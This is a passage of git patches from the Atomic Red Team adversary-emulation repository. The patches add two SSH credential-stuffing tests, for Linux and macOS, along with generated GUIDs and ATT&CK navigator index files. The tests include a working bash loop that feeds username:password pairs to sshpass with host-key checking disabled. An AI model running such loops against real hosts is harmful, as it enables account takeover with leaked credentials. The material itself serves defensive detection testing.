Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9cb1ac61..fd5147ce 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -831,7 +831,72 @@ credential-access: x_mitre_contributors: - Diogo Fernandes - Anastasios Pingios - atomic_tests: [] + identifier: T1110.004 + atomic_tests: + - name: SSH Credential Stuffing From Linux + auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad + description: 'Using username,password combination from a password dump to login + over SSH. + +' + supported_platforms: + - linux + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + dependency_executor_name: bash + dependencies: + - description: 'Requires SSHPASS + +' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || + [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo + apt install sshpass -y; else echo "This test requires sshpass" ; fi ; + +' + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + - name: SSH Credential Stuffing From MacOS + auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + description: 'Using username,password combination from a password dump to login + over SSH. + +' + supported_platforms: + - macos + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + dependency_executor_name: bash + dependencies: + - description: 'Requires SSHPASS + +' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: | + /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" + brew install hudochenkov/sshpass/sshpass + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done T1552.001: technique: id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md new file mode 100644 index 00000000..54dcd9de --- /dev/null +++ b/atomics/T1110.004/T1110.004.md @@ -0,0 +1,115 @@ +# T1110.004 - Credential Stuffing +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/004) +
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts. + +Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. + +Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following: + +* SSH (22/TCP) +* Telnet (23/TCP) +* FTP (21/TCP) +* NetBIOS / SMB / Samba (139/TCP & 445/TCP) +* LDAP (389/TCP) +* Kerberos (88/TCP) +* RDP / Terminal Services (3389/TCP) +* HTTP/HTTP Management Services (80/TCP & 443/TCP) +* MSSQL (1433/TCP) +* Oracle (1521/TCP) +* MySQL (3306/TCP) +* VNC (5900/TCP) + +In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
+ +## Atomic Tests + +- [Atomic Test #1 - SSH Credential Stuffing From Linux](#atomic-test-1---ssh-credential-stuffing-from-linux) + +- [Atomic Test #2 - SSH Credential Stuffing From MacOS](#atomic-test-2---ssh-credential-stuffing-from-macos) + + +
+ +## Atomic Test #1 - SSH Credential Stuffing From Linux +Using username,password combination from a password dump to login over SSH. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_host | IP Address / Hostname you want to target. | String | localhost| + + +#### Attack Commands: Run with `bash`! + + +```bash +cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ +for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done +``` + + + + +#### Dependencies: Run with `bash`! +##### Description: Requires SSHPASS +##### Check Prereq Commands: +```bash +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; +``` + + + + +
+
+ +## Atomic Test #2 - SSH Credential Stuffing From MacOS +Using username,password combination from a password dump to login over SSH. + +**Supported Platforms:** macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_host | IP Address / Hostname you want to target. | String | localhost| + + +#### Attack Commands: Run with `bash`! + + +```bash +cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ +for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done +``` + + + + +#### Dependencies: Run with `bash`! +##### Description: Requires SSHPASS +##### Check Prereq Commands: +```bash +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```bash +/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" +brew install hudochenkov/sshpass/sshpass +``` + + + + +
From 130328dafc7f5c9774ca206fa674b3353aefe199 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 20:04:34 +0000 Subject: [PATCH 25/35] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1036.005/T1036.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 4c81dd2d..2dc6b7b9 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -4,6 +4,7 @@ display_name: 'Masquerading: Match Legitimate Name or Location' atomic_tests: - name: Execute a process from a directory masquerading as the current parent directory. + auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 description: | Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f60266d0..6b32dc04 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -718,3 +718,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 437b2003-a20d-4ed8-834c-4964f24eec63 4f08197a-2a8a-472d-9589-cd2895ef22ad d546a3d9-0be5-40c7-ad82-5a7d79e1b66b +812c3ab8-94b0-4698-a9bf-9420af23ce24 From ecc7d70057bcbfb2879c763651393347e27d21ce Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 20:04:40 +0000 Subject: [PATCH 26/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/linux-index.md | 3 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/macos-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 28 ++++++++++- atomics/T1036.005/T1036.005.md | 47 +++++++++++++++++++ 14 files changed, 89 insertions(+), 10 deletions(-) create mode 100644 atomics/T1036.005/T1036.005.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 969f8c8f..cdeac0bd 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 018c33c7..0a502e83 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true}